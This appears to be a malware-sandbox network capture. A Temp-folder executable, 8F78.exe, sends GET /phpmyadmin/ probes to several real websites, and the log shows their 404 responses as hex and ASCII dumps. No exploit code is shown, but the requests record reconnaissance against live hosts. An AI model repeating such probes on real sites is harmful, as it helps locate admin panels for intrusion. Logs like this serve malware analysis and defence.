                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC4217INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 2d 20 e5 8d 83 e8
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0, minimum-scale=1.0"><meta name="description" content=" -
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC4587INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6d 65 74 65 6f 72 2d 73 6c 69 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 79 63 6c 65 2e 61 6c 6c 2e 6a 73 3f 76 65 72 3d 35 2e 30 2e 32 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6d 65 74 65 6f 72 2d 73 6c 69 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 65 74 61 64 61 74 61 2e 76 32 2e 6a 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type='text/javascript' src='https://magokorokan.com/wp-content/plugins/meteor-slides/js/jquery.cycle.all.js?ver=5.0.20'></script><script type='text/javascript' src='https://magokorokan.com/wp-content/plugins/meteor-slides/js/jquery.metadata.v2.js
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC6INData Raw: 31 35 31 34 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1514
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC5396INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 6e 61 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 09 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 62 72 65 61 64 5f 63 72 75 6d 62 22 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 65 76 65 6c 2d 31 20 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 67 6f 6b 6f 72 6f 6b 61 6e 2e 63 6f 6d 2f 22 3e e3 83 9b e3 83 bc e3 83 a0 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 65 76 65 6c 2d 32 20 73 75 62 20 74 61 69 6c 20 63 75 72 72 65 6e 74 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 73 65 63 74 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: </div> </div> </nav><div class="wrapper"><div id="content"><ul class="bread_crumb"><li class="level-1 top"><a href="https://magokorokan.com/"></a></li><li class="level-2 sub tail current">404 Not Found</li></ul><secti
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                65192.168.2.45424489.161.228.1194435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: preda.pl
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC157INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 570
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: IdeaWebServer/5.4.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC570INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 404</title><link href="/idea/static/style.css" rel="stylesheet


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                66192.168.2.454382193.163.77.64435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC511INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=ljen1b9anoc766iiikaedbp8hc; path=/
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-length: 147136
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 09 0a 09 20 20 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 0a 0a 0a 20 20 3c 74 69 74 6c 65 3e 43 68 79 62 61 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 c3 ba 74 6f 20 73 74 72 c3 a1 6e 6b 75 20 6e 69 65 20 6a 65 20 6d 6f c5 be 6e c3 a9 20 6e c3 a1 6a 73 c5 a5 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="sk"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Chyba 404</title> <meta name="description" content="Tto strnku nie je mon njs"> <meta name="key
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 31 33 37 32 7d 2c 22 73 75 70 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 5f 32 78 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 5c 2f 69 6d 67 5c 2f 70 5c 2f 73 6b 2d 64 65 66 61 75 6c 74 2d 73 75 70 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 5f 32 78 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 31 33 37 32 7d 7d 2c 22 73 6d 61 6c 6c 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 5c 2f 69 6d 67 5c 2f 70 5c 2f 73 6b 2d 64 65 66 61 75 6c 74 2d 63 61 72 74 5f 64 65 66 61 75 6c 74 2e 6a 70 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: erlarge_default.jpg","width":1200,"height":1372},"superlarge_default_2x":{"url":"https:\/\/janckulik.sk\/img\/p\/sk-default-superlarge_default_2x.jpg","width":1200,"height":1372}},"small":{"url":"https:\/\/janckulik.sk\/img\/p\/sk-default-cart_default.jpg
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 74 5f 32 5f 34 20 2e 65 61 73 79 5f 69 63 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 68 65 61 64 65 72 7b 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b
                                                                                                                                                                                                                                                                                                                                Data Ascii: t_2_4 .easy_icon{font-size: 14px;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_icon{margin-bottom: 0px;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_header{color: #666666;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_header{font-size: 12px;
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 72 5f 34 2e 66 6c 61 67 5f 31 3a 62 65 66 6f 72 65 2c 20 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 32 3a 62 65 66 6f 72 65 7b 74 6f 70 3a 2d 30 70 78 3b 7d 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 31 3a 62 65 66 6f 72 65 7b 72 69 67 68 74 3a 2d 31 31 70 78 3b 7d 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 32 3a 62 65 66 6f 72 65 7b 6c 65 66 74 3a 2d 31 31 70 78 3b 7d 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 7d 2e 73 74 5f 73 74 69 63 6b 65 72 5f 32 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 73 74 5f 73 74 69 63 6b
                                                                                                                                                                                                                                                                                                                                Data Ascii: r_4.flag_1:before, .pro_first_box .st_sticker_4.flag_2:before{top:-0px;}.pro_first_box .st_sticker_4.flag_1:before{right:-11px;}.pro_first_box .st_sticker_4.flag_2:before{left:-11px;}.st_sticker_4{font-weight:normal;}.st_sticker_2{color:#ffffff;}.st_stick
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 3e 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 74 6f 70 5f 65 78 74 72 61 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 5f 6d 65 6e 75 5f 68 61 73 5f 77 69 64 67 65 74 73 5f 31 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 5f 6d 65 67 61 5f 6d 65 6e 75 5f 63 6f 6e 74 61 69 6e 65 72 20 61 6e 69 6d 61 74 65 64 20 66 61 73 74 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 74 6f 70 5f 65 78 74 72 61 5f 63 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 66 6c 65 78 5f 63 6f 6e 74 61 69 6e 65 72 20 22 3e 0a 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: ></div> <section id="top_extra" class="main_menu_has_widgets_1"> <div class=""> <div class="st_mega_menu_container animated fast"> <div class="container"> <div id="top_extra_container" class="flex_container ">
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 6c 65 22 3e 0d 0a 3c 6c 69 3e 49 4e 46 4f 4c 49 4e 4b 41 3a c2 a0 30 34 33 2f 20 35 35 32 30 30 31 30 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 45 4d 41 49 4c 3a 20 70 72 65 64 61 6a 6e 61 40 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 41 44 52 45 53 41 3a 20 48 76 69 65 7a 64 6f 73 6c 61 76 6f 76 6f 20 6e c3 a1 6d 2e 20 32 30 31 2c 20 30 32 39 20 30 31 20 4e c3 a1 6d 65 73 74 6f 76 6f 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 4f 54 56 c3 81 52 41 43 49 45 20 48 4f 44 49 4e 59 3a 20 50 6f 6e 64 65 6c 6f 6b 20 2d 20 50 69 61 74 6f 6b 20 38 3a 30 30 20 2d 20 31 36 3a 33 30 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: le"><li>INFOLINKA:043/ 5520010</li><li>EMAIL: predajna@janckulik.sk</li><li>ADRESA: Hviezdoslavovo nm. 201, 029 01 Nmestovo</li><li>OTVRACIE HODINY: Pondelok - Piatok 8:00 - 16:30</li><li> S
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 6c 69 6b 2e 73 6b 2f 32 32 36 2d 66 72 69 74 65 7a 79 2d 61 2d 70 65 6b 61 72 6e 65 2d 63 68 6c 65 62 61 22 20 74 69 74 6c 65 3d 22 46 72 69 74 c3 a9 7a 79 20 61 20 70 65 6b c3 a1 72 6e 65 20 63 68 6c 65 62 61 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 61 20 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 32 20 6d 61 5f 69 74 65 6d 20 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 74 6f 2d 61 6e 67 6c 65 2d 72 69 67 68 74 20 6c 69 73 74 5f 61 72 72 6f 77 22 3e 3c 2f 69 3e 46 72 69 74 c3 a9 7a 79 20 61 20 70 65 6b c3 a1 72 6e 65 20 63 68 6c 65 62 61 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 6c 69 20 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 32 20 67 72 61 6e 64 69 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: lik.sk/226-fritezy-a-pekarne-chleba" title="Fritzy a pekrne chleba" class="mo_sub_a mo_ma_level_2 ma_item "><i class="fto-angle-right list_arrow"></i>Fritzy a pekrne chleba</a></div></li><li class="mo_sub_li mo_ml_level_2 grandit
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 22 66 74 6f 2d 6d 69 6e 75 73 20 6d 69 6e 75 73 5f 73 69 67 6e 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 75 6c 20 6d 6f 5f 6d 75 5f 6c 65 76 65 6c 5f 32 20 70 5f 67 72 61 6e 64 69 74 65 6d 5f 31 22 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 6c 69 20 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 32 20 67 72 61 6e 64 69 74 65 6d 5f 30 20 70 5f 67 72 61 6e 64 69 74 65 6d 5f 31 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 5f 61 5f 77 72 61 70 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6e 63 6b 75 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: "fto-minus minus_sign"></i></span></div><ul class="mo_sub_ul mo_mu_level_2 p_granditem_1"><li class="mo_sub_li mo_ml_level_2 granditem_0 p_granditem_1"><div class="menu_a_wrap"><a href="https://janckul
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 50 72 c3 ad 73 6c 75 c5 a1 65 6e 73 74 76 6f 20 6b 20 76 79 73 c3 a1 76 61 c4 8d 6f 6d 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 61 20 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 32 20 6d 61 5f 69 74 65 6d 20 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 74 6f 2d 61 6e 67 6c 65 2d 72 69 67 68 74 20 6c 69 73 74 5f 61 72 72 6f 77 22 3e 3c 2f 69 3e 50 72 c3 ad 73 6c 75 c5 a1 65 6e 73 74 76 6f 20 6b 20 76 79 73 c3 a1 76 61 c4 8d 6f 6d 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 75 6c 3e 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d
                                                                                                                                                                                                                                                                                                                                Data Ascii: Prsluenstvo k vysvaom" class="mo_sub_a mo_ma_level_2 ma_item "><i class="fto-angle-right list_arrow"></i>Prsluenstvo k vysvaom</a></div></li></ul></li></ul><ul class="m
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC8192INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 75 5f 6c 65 76 65 6c 5f 31 20 6d 6f 5f 73 75 62 5f 75 6c 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 31 20 6d 6f 5f 73 75 62 5f 6c 69 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 5f 61 5f 77 72 61 70 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 2f 35 38 2d 75 6d 79 76 61 63 6b 79 2d 72 69 61 64 75 22 20 74 69 74 6c 65 3d 22 55 6d c3 bd 76 61 c4 8d 6b 79 20 72 69 61 64 75 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <ul class="mo_mu_level_1 mo_sub_ul"><li class="mo_ml_level_1 mo_sub_li"><div class="menu_a_wrap"><a href="https://janckulik.sk/58-umyvacky-riadu" title="Umvaky riadu" class="mo_ma_level_1


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                67192.168.2.454383193.163.77.64435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC511INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=b67g2gqeru36u8lrmjb9ci567e; path=/
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-length: 147136
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 09 0a 09 20 20 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 0a 0a 0a 20 20 3c 74 69 74 6c 65 3e 43 68 79 62 61 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 c3 ba 74 6f 20 73 74 72 c3 a1 6e 6b 75 20 6e 69 65 20 6a 65 20 6d 6f c5 be 6e c3 a9 20 6e c3 a1 6a 73 c5 a5 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="sk"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Chyba 404</title> <meta name="description" content="Tto strnku nie je mon njs"> <meta name="key
